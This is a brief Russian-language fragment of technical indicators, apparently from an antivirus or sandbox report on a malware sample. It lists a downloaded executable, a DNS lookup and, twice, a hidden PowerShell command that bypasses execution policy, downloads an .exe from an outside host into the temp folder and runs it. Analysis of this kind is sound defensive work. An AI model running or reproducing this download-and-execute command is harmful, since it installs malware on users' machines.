Техническая информация
- http://zcocainem.host/dome_output92af56f.exe как %temp%\\dome_output92af56f.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://zcocainem.host/dome_output92AF56F.exe','%TEMP%\\dome_output92AF56F.exe') & %TEMP%\\dome_output...
- DNS ASK zc###inem.host
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://zcocainem.host/dome_output92AF56F.exe','%TEMP%\\dome_output92AF56F.exe') & %TEMP%\\dome_output...' (со скрытым окном)